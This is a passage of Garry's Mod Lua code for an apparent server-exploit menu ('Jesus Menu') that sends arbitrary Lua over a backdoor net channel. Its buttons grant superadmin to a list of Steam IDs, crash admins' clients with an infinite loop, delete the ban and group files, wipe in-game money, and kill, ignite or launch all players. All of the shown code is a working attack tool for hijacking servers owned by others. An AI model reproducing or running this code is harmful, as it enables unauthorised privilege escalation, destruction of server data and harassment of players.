  1319. Macro.DoClick = function()
  1320. net.Start(netKey)
  1321. net.WriteString(" for k, v in pairs( player.GetAll() ) do v:SendLua( [[util.ScreenShake( Vector( 0, 0, 0 ), 10, 5, 60, 5000 )]] ) end ")
  1322. net.WriteBit(1)
  1323. net.SendToServer()
  1324. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Earthquake activé" )
  1325. SploitNotify("Eathquake activé !")
  1326. surface.PlaySound("buttons/blip1.wav")
  1327. end
  1328.  
  1329. local Macro = vgui.Create( "DButton" )
  1330. Macro:SetParent(Misc)
  1331. Macro:SetPos( 20, 30 )
  1332. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1333. Macro:SetSize( 110, 25 )
  1334. Macro:SetText( "Superadmin gibbs47" )
  1335. Macro.Paint = function()
  1336. surface.SetDrawColor(29, 39, 55)
  1337. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1338. surface.SetDrawColor( 32, 80, 154 )
  1339. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1340. end
  1341. Macro.DoClick = function()
  1342. net.Start(netKey)
  1343. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:1:59575261\", \"superadmin\")")
  1344. net.WriteBit(1)
  1345. net.SendToServer()
  1346. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:1:59575261 est superadmin." )
  1347. SploitNotify("Superadmin set OK")
  1348. surface.PlaySound("buttons/blip1.wav")
  1349. end
  1350.  
  1351. local Macro = vgui.Create( "DButton" )
  1352. Macro:SetParent(Misc)
  1353. Macro:SetPos( 20, 60 )
  1354. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1355. Macro:SetSize( 110, 25 )
  1356. Macro:SetText( "Superadmin jesuschrist_officiel" )
  1357. Macro.Paint = function()
  1358. surface.SetDrawColor(29, 39, 55)
  1359. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1360. surface.SetDrawColor( 32, 80, 154 )
  1361. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1362. end
  1363. Macro.DoClick = function()
  1364. net.Start(netKey)
  1365. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:1:422795969\", \"superadmin\")")
  1366. net.WriteBit(1)
  1367. net.SendToServer()
  1368. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:1:422795969 est superadmin" )
  1369. SploitNotify("Superadmin set OK")
  1370. surface.PlaySound("buttons/blip1.wav")
  1371. end
  1372.  
  1373. local Macro = vgui.Create( "DButton" )
  1374. Macro:SetParent(Misc)
  1375. Macro:SetPos( 20, 90 )
  1376. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1377. Macro:SetSize( 110, 25 )
  1378. Macro:SetText( "Superadmin zilnix" )
  1379. Macro.Paint = function()
  1380. surface.SetDrawColor(29, 39, 55)
  1381. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1382. surface.SetDrawColor( 32, 80, 154 )
  1383. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1384. end
  1385. Macro.DoClick = function()
  1386. net.Start(netKey)
  1387. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:162931507\", \"superadmin\")")
  1388. net.WriteBit(1)
  1389. net.SendToServer()
  1390. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:162931507 est superadmin" )
  1391. SploitNotify("Superadmin set OK")
  1392. surface.PlaySound("buttons/blip1.wav")
  1393. end
  1394.  
  1395. local Macro = vgui.Create( "DButton" )
  1396. Macro:SetParent(Misc)
  1397. Macro:SetPos( 20, 120 )
  1398. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1399. Macro:SetSize( 110, 25 )
  1400. Macro:SetText( "Superadmin manon" )
  1401. Macro.Paint = function()
  1402. surface.SetDrawColor(29, 39, 55)
  1403. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1404. surface.SetDrawColor( 32, 80, 154 )
  1405. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1406. end
  1407. Macro.DoClick = function()
  1408. net.Start(netKey)
  1409. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:27728622\", \"superadmin\")")
  1410. net.WriteBit(1)
  1411. net.SendToServer()
  1412. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:27728622 est superadmin" )
  1413. SploitNotify("Superadmin set OK")
  1414. surface.PlaySound("buttons/blip1.wav")
  1415. end
  1416.  
  1417. local Macro = vgui.Create( "DButton" )
  1418. Macro:SetParent(Misc)
  1419. Macro:SetPos( 20, 150 )
  1420. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1421. Macro:SetSize( 110, 25 )
  1422. Macro:SetText( "Superadmin oxalo" )
  1423. Macro.Paint = function()
  1424. surface.SetDrawColor(29, 39, 55)
  1425. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1426. surface.SetDrawColor( 32, 80, 154 )
  1427. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1428. end
  1429. Macro.DoClick = function()
  1430. net.Start(netKey)
  1431. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:102386567\", \"superadmin\")")
  1432. net.WriteBit(1)
  1433. net.SendToServer()
  1434. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:102386567 est superadmin" )
  1435. SploitNotify("Superadmin set OK")
  1436. surface.PlaySound("buttons/blip1.wav")
  1437. end
  1438.  
  1439. local Macro = vgui.Create( "DButton" )
  1440. Macro:SetParent(Misc)
  1441. Macro:SetPos( 20, 180 )
  1442. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1443. Macro:SetSize( 110, 25 )
  1444. Macro:SetText( "Superadmin boblepongebgdu49" )
  1445. Macro.Paint = function()
  1446. surface.SetDrawColor(29, 39, 55)
  1447. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1448. surface.SetDrawColor( 32, 80, 154 )
  1449. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1450. end
  1451. Macro.DoClick = function()
  1452. net.Start(netKey)
  1453. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:1:425619663\", \"superadmin\")")
  1454. net.WriteBit(1)
  1455. net.SendToServer()
  1456. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:1:425619663 est superadmin." )
  1457. SploitNotify("Superadmin set OK")
  1458. surface.PlaySound("buttons/blip1.wav")
  1459. end
  1460.  
  1461. local Macro = vgui.Create( "DButton" )
  1462. Macro:SetParent(Misc)
  1463. Macro:SetPos( 20, 210 )
  1464. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1465. Macro:SetSize( 110, 25 )
  1466. Macro:SetText( "Superadmin doralexploratricelaplusbelle" )
  1467. Macro.Paint = function()
  1468. surface.SetDrawColor(29, 39, 55)
  1469. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1470. surface.SetDrawColor( 32, 80, 154 )
  1471. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1472. end
  1473. Macro.DoClick = function()
  1474. net.Start(netKey)
  1475. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:425627691\", \"superadmin\")")
  1476. net.WriteBit(1)
  1477. net.SendToServer()
  1478. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:425627691 est superadmin." )
  1479. SploitNotify("Superadmin set OK")
  1480. surface.PlaySound("buttons/blip1.wav")
  1481. end
  1482.  
  1483. local Macro = vgui.Create( "DButton" )
  1484. Macro:SetParent(Misc)
  1485. Macro:SetPos( 20, 240 )
  1486. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1487. Macro:SetSize( 110, 25 )
  1488. Macro:SetText( "Superadmin Silent" )
  1489. Macro.Paint = function()
  1490. surface.SetDrawColor(29, 39, 55)
  1491. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1492. surface.SetDrawColor( 32, 80, 154 )
  1493. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1494. end
  1495. Macro.DoClick = function()
  1496. net.Start(netKey)
  1497. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:99250842\", \"superadmin\")")
  1498. net.WriteBit(1)
  1499. net.SendToServer()
  1500. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:99250842 est superadmin." )
  1501. SploitNotify("Superadmin set OK")
  1502. surface.PlaySound("buttons/blip1.wav")
  1503. end
  1504.  
  1505. local Macro = vgui.Create( "DButton" )
  1506. Macro:SetParent(Misc)
  1507. Macro:SetPos( 20, 270 )
  1508. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1509. Macro:SetSize( 110, 25 )
  1510. Macro:SetText( "Superadmin Hoper" )
  1511. Macro.Paint = function()
  1512. surface.SetDrawColor(29, 39, 55)
  1513. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1514. surface.SetDrawColor( 32, 80, 154 )
  1515. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1516. end
  1517. Macro.DoClick = function()
  1518. net.Start(netKey)
  1519. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:189348722\", \"superadmin\")")
  1520. net.WriteBit(1)
  1521. net.SendToServer()
  1522. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:189348722 est superadmin." )
  1523. SploitNotify("Superadmin set OK")
  1524. surface.PlaySound("buttons/blip1.wav")
  1525. end
  1526.  
  1527. local Macro = vgui.Create( "DButton" )
  1528. Macro:SetParent(Misc)
  1529. Macro:SetPos( 20, 300 )
  1530. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1531. Macro:SetSize( 110, 25 )
  1532. Macro:SetText( "Superadmin wazzak" )
  1533. Macro.Paint = function()
  1534. surface.SetDrawColor(29, 39, 55)
  1535. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1536. surface.SetDrawColor( 32, 80, 154 )
  1537. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1538. end
  1539. Macro.DoClick = function()
  1540. net.Start(netKey)
  1541. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"\", \"superadmin\")")
  1542. net.WriteBit(1)
  1543. net.SendToServer()
  1544. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " est superadmin." )
  1545. SploitNotify("Superadmin set OK")
  1546. surface.PlaySound("buttons/blip1.wav")
  1547. end
  1548.  
  1549. local Macro = vgui.Create( "DButton" )
  1550. Macro:SetParent(Misc)
  1551. Macro:SetPos( 20, 330 )
  1552. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1553. Macro:SetSize( 110, 25 )
  1554. Macro:SetText( "Superadmin Lolo91160" )
  1555. Macro.Paint = function()
  1556. surface.SetDrawColor(29, 39, 55)
  1557. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1558. surface.SetDrawColor( 32, 80, 154 )
  1559. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1560. end
  1561. Macro.DoClick = function()
  1562. net.Start(netKey)
  1563. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:0:315052913\", \"superadmin\")")
  1564. net.WriteBit(1)
  1565. net.SendToServer()
  1566. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "STEAM_0:0:315052913 est superadmin." )
  1567. SploitNotify("Superadmin set OK")
  1568. surface.PlaySound("buttons/blip1.wav")
  1569. end
  1570.  
  1571.  
  1572.  
  1573. local Macro = vgui.Create( "DButton" )
  1574. Macro:SetParent(Controller)
  1575. Macro:SetPos( 380, 60 )
  1576. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1577. Macro:SetSize( 110, 25 )
  1578. Macro:SetText( "Crash admins" )
  1579. Macro.Paint = function()
  1580. surface.SetDrawColor(29, 39, 55)
  1581. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1582. surface.SetDrawColor( 32, 80, 154 )
  1583. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1584. end
  1585. Macro.DoClick = function()
  1586. net.Start(netKey)
  1587. net.WriteString( " for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != \"user\" ) then v:SendLua(\"while true do end\") end end" )
  1588. net.WriteBit (1)
  1589. net.SendToServer()
  1590. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Les admins ont crash :)" )
  1591. SploitNotify("Tout les admins vont crash !")
  1592. surface.PlaySound("buttons/blip1.wav")
  1593. end
  1594.  
  1595. local Macro = vgui.Create( "DButton" )
  1596. Macro:SetParent(Controller)
  1597. Macro:SetPos( 380, 90 )
  1598. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1599. Macro:SetSize( 110, 25 )
  1600. Macro:SetText( "Pousser tout le monde" )
  1601. Macro.Paint = function()
  1602. surface.SetDrawColor(29, 39, 55)
  1603. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1604. surface.SetDrawColor( 32, 80, 154 )
  1605. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1606. end
  1607. Macro.DoClick = function()
  1608. net.Start(netKey)
  1609. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000))) end" )
  1610. net.WriteBit (1)
  1611. net.SendToServer()
  1612. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Pousser tout le monde activé" )
  1613. SploitNotify("Tout le monde se pousse !")
  1614. surface.PlaySound("buttons/blip1.wav")
  1615. end
  1616.  
  1617. local Macro = vgui.Create( "DButton" )
  1618. Macro:SetParent(Controller)
  1619. Macro:SetPos( 380, 120 )
  1620. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1621. Macro:SetSize( 110, 25 )
  1622. Macro:SetText( "Reset argent" )
  1623. Macro.Paint = function()
  1624. surface.SetDrawColor(29, 39, 55)
  1625. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1626. surface.SetDrawColor( 32, 80, 154 )
  1627. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1628. end
  1629. Macro.DoClick = function()
  1630. net.Start(netKey)
  1631. net.WriteString( "RunConsoleCommand(\"rp_resetallmoney\")" )
  1632. net.WriteBit (1)
  1633. net.SendToServer()
  1634. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Argent reset" )
  1635. SploitNotify("Argent reset")
  1636. surface.PlaySound("buttons/blip1.wav")
  1637. end
  1638.  
  1639. local Macro = vgui.Create( "DButton" )
  1640. Macro:SetParent(Controller)
  1641. Macro:SetPos( 380, 150 )
  1642. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1643. Macro:SetSize( 110, 25 )
  1644. Macro:SetText( "Inversé la gravité" )
  1645. Macro.Paint = function()
  1646. surface.SetDrawColor(29, 39, 55)
  1647. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1648. surface.SetDrawColor( 32, 80, 154 )
  1649. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1650. end
  1651. Macro.DoClick = function()
  1652. net.Start(netKey)
  1653. net.WriteString( "RunConsoleCommand(\"sv_gravity\", \"-600\")" )
  1654. net.WriteBit (1)
  1655. net.SendToServer()
  1656. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Gravité inversé" )
  1657. SploitNotify("Gravité inversé à -600")
  1658. surface.PlaySound("buttons/blip1.wav")
  1659. end
  1660.  
  1661. local Macro = vgui.Create( "DButton" )
  1662. Macro:SetParent(Controller)
  1663. Macro:SetPos( 380, 180 )
  1664. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1665. Macro:SetSize( 110, 25 )
  1666. Macro:SetText( "Niquer la physic" )
  1667. Macro.Paint = function()
  1668. surface.SetDrawColor(29, 39, 55)
  1669. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1670. surface.SetDrawColor( 32, 80, 154 )
  1671. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1672. end
  1673. Macro.DoClick = function()
  1674. net.Start(netKey)
  1675. net.WriteString( "RunConsoleCommand(\"sv_friction\", \"-8\")" )
  1676. net.WriteBit (1)
  1677. net.SendToServer()
  1678. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Physic niqué" )
  1679. SploitNotify("Physic changé à -8")
  1680. surface.PlaySound("buttons/blip1.wav")
  1681. end
  1682.  
  1683. local Macro = vgui.Create( "DButton" )
  1684. Macro:SetParent(Controller)
  1685. Macro:SetPos( 380, 210 )
  1686. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1687. Macro:SetSize( 110, 25 )
  1688. Macro:SetText( "Hurlement" )
  1689. Macro.Paint = function()
  1690. surface.SetDrawColor(29, 39, 55)
  1691. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1692. surface.SetDrawColor( 32, 80, 154 )
  1693. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1694. end
  1695. Macro.DoClick = function()
  1696. net.Start(netKey)
  1697. net.WriteString( "for k,v in pairs(player.GetAll()) do v:EmitSound( \"npc/stalker/go_alert2a.wav\", 100, 100 ) end" )
  1698. net.WriteBit (1)
  1699. net.SendToServer()
  1700. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Hurlement activé !" )
  1701. SploitNotify("Hurlement activé")
  1702. surface.PlaySound("buttons/blip1.wav")
  1703. end
  1704.  
  1705. local Macro = vgui.Create( "DButton" )
  1706. Macro:SetParent(Controller)
  1707. Macro:SetPos( 380, 240 )
  1708. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1709. Macro:SetSize( 110, 25 )
  1710. Macro:SetText( "Change map gm_construct" )
  1711. Macro.Paint = function()
  1712. surface.SetDrawColor(29, 39, 55)
  1713. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1714. surface.SetDrawColor( 32, 80, 154 )
  1715. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1716. end
  1717. Macro.DoClick = function()
  1718. net.Start(netKey)
  1719. net.WriteString("RunConsoleCommand(\"ulx\", \"map\", \"gm_construct\")")
  1720. net.WriteBit (1)
  1721. net.SendToServer()
  1722. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Map changé à GM_CONSTRUCT" )
  1723. SploitNotify("Map changé à GM_CONSTRUCT")
  1724. surface.PlaySound("buttons/blip1.wav")
  1725. end
  1726.  
  1727. local Macro = vgui.Create( "DButton" )
  1728. Macro:SetParent(Controller)
  1729. Macro:SetPos( 380, 270 )
  1730. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1731. Macro:SetSize( 110, 25 )
  1732. Macro:SetText( "Supprimer les grades" )
  1733. Macro.Paint = function()
  1734. surface.SetDrawColor(29, 39, 55)
  1735. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1736. surface.SetDrawColor( 32, 80, 154 )
  1737. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1738. end
  1739. Macro.DoClick = function()
  1740. net.Start(netKey)
  1741. net.WriteString( "if file.Exists( \"ulib/groups.txt\", \"DATA\" ) then file.Delete(\"ulib/groups.txt\") end" )
  1742. net.WriteBit (1)
  1743. net.SendToServer()
  1744. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Grades supprimés" )
  1745. SploitNotify("Grades supprimés.")
  1746. surface.PlaySound("buttons/blip1.wav")
  1747. end
  1748.  
  1749. local Macro = vgui.Create( "DButton" )
  1750. Macro:SetParent(Controller)
  1751. Macro:SetPos( 380, 300 )
  1752. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1753. Macro:SetSize( 110, 25 )
  1754. Macro:SetText( "Bruler tout le monde" )
  1755. Macro.Paint = function()
  1756. surface.SetDrawColor(29, 39, 55)
  1757. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1758. surface.SetDrawColor( 32, 80, 154 )
  1759. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1760. end
  1761. Macro.DoClick = function()
  1762. net.Start(netKey)
  1763. net.WriteString( "for k,v in pairs(player.GetAll()) do v:Ignite(120) end" )
  1764. net.WriteBit (1)
  1765. net.SendToServer()
  1766. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde brûle" )
  1767. SploitNotify("Tout le monde brule !")
  1768. surface.PlaySound("buttons/blip1.wav")
  1769. end
  1770.  
  1771. local Macro = vgui.Create( "DButton" )
  1772. Macro:SetParent(Controller)
  1773. Macro:SetPos( 380, 330 )
  1774. Macro:SetText( "Deban tout le monde" )
  1775. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1776. Macro:SetSize( 110, 25 )
  1777. Macro.Paint = function()
  1778. surface.SetDrawColor(29, 39, 55)
  1779. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1780. surface.SetDrawColor( 32, 80, 154 )
  1781. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1782. end
  1783. Macro.DoClick = function()
  1784. net.Start(netKey)
  1785. net.WriteString( "if file.Exists( \"ulib/bans.txt\", \"DATA\" ) then file.Delete(\"ulib/bans.txt\") end" )
  1786. net.WriteBit (1)
  1787. net.SendToServer()
  1788. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde est debanni" )
  1789. SploitNotify("Plus personne n'est banni.")
  1790. surface.PlaySound("buttons/blip1.wav")
  1791. end
  1792.  
  1793. local Macro = vgui.Create( "DButton" )
  1794. Macro:SetParent(Controller)
  1795. Macro:SetPos( 380, 360 )
  1796. Macro:SetText( "Tuer tout le monde" )
  1797. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1798. Macro:SetSize( 110, 25 )
  1799. Macro.Paint = function()
  1800. surface.SetDrawColor(29, 39, 55)
  1801. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1802. surface.SetDrawColor( 32, 80, 154 )
  1803. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1804. end
  1805. Macro.DoClick = function()
  1806. net.Start(netKey)
  1807. net.WriteString( "for k,v in pairs(player.GetAll()) do v:Kill() end" )
  1808. net.WriteBit (1)
  1809. net.SendToServer()
  1810. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde est mort" )
  1811. SploitNotify("Tout le monde est mort !)")
  1812. surface.PlaySound("buttons/blip1.wav")
  1813. end
  1814.  
  1815. local Macro = vgui.Create( "DButton" )
  1816. Macro:SetParent(Controller)
  1817. Macro:SetPos( 380, 30 )
  1818. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1819. Macro:SetSize( 110, 25 )
  1820. Macro:SetText( "Grosse tête" )
  1821. Macro.Paint = function()
  1822. surface.SetDrawColor(29, 39, 55)
  1823. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1824. surface.SetDrawColor( 32, 80, 154 )
  1825. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1826. end --
  1827. Macro.DoClick = function()
  1828. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde à une grosse tête :)" )
  1829. SploitNotify("Tout le monde à une grosse tête")
  1830. surface.PlaySound("buttons/blip1.wav")
  1831. net.Start(netKey)
  1832. net.WriteString([[
  1833. for k,v in pairs(player.GetAll()) do
  1834. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  1835. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  1836. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  1837. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  1838. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  1839. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  1840. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  1841. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  1842. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  1843. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  1844. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  1845.  
  1846. v:ManipulateBoneScale( a, Vector(100,100,100))
  1847. v:ManipulateBoneScale( b, Vector(100,100,100))
  1848. v:ManipulateBoneScale( c, Vector(100,100,100))
  1849. v:ManipulateBoneScale( d, Vector(100,100,100))
  1850. v:ManipulateBoneScale( e, Vector(100,100,100))
  1851. v:ManipulateBoneScale( f, Vector(100,100,100))
  1852. v:ManipulateBoneScale( g, Vector(100,100,100))
  1853. v:ManipulateBoneScale( h, Vector(100,100,100))
  1854. v:ManipulateBoneScale( i, Vector(100,100,100))
  1855. v:ManipulateBoneScale( j, Vector(100,100,100))
  1856. v:ManipulateBoneScale( k, Vector(100,100,100))
  1857. end]])
  1858. net.WriteBit(1)
  1859. net.SendToServer()
  1860. end
  1861.  
  1862. local Macro = vgui.Create( "DButton" )
  1863. Macro:SetParent(Controller)
  1864. Macro:SetPos( 500, 60 )
  1865. Macro:SetText( "STOP 2D player" )
  1866. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1867. Macro:SetSize( 110, 25 )
  1868. Macro.Paint = function()
  1869. surface.SetDrawColor(29, 39, 55)
  1870. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1871. surface.SetDrawColor( 32, 80, 154 )
  1872. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1873. end
  1874. Macro.DoClick = function()
  1875. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "2D player désactivé !" )
  1876. SploitNotify("2D player désactivé !")
  1877. surface.PlaySound("buttons/blip1.wav")
  1878. net.Start(netKey)
  1879. net.WriteString([[
  1880. for k,v in pairs(player.GetAll()) do
  1881. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  1882. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  1883. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  1884. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  1885. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  1886. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  1887. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  1888. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  1889. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  1890. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  1891. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  1892.  
  1893. v:ManipulateBoneScale( a, Vector(1,1,1))
  1894. v:ManipulateBoneScale( b, Vector(1,1,1))
  1895. v:ManipulateBoneScale( c, Vector(1,1,1))
  1896. v:ManipulateBoneScale( d, Vector(1,1,1))
  1897. v:ManipulateBoneScale( e, Vector(1,1,1))
  1898. v:ManipulateBoneScale( f, Vector(1,1,1))
  1899. v:ManipulateBoneScale( g, Vector(1,1,1))
  1900. v:ManipulateBoneScale( h, Vector(1,1,1))
  1901. v:ManipulateBoneScale( i, Vector(1,1,1))
  1902. v:ManipulateBoneScale( j, Vector(1,1,1))
  1903. v:ManipulateBoneScale( k, Vector(1,1,1))
  1904. end]])
  1905. net.WriteBit(1)
  1906. net.SendToServer()
  1907. end
  1908.  
  1909. local Macro = vgui.Create( "DButton" )
  1910. Macro:SetParent(Controller)
  1911. Macro:SetPos( 500, 90 )
  1912. Macro:SetText( "M9K Nuke" )
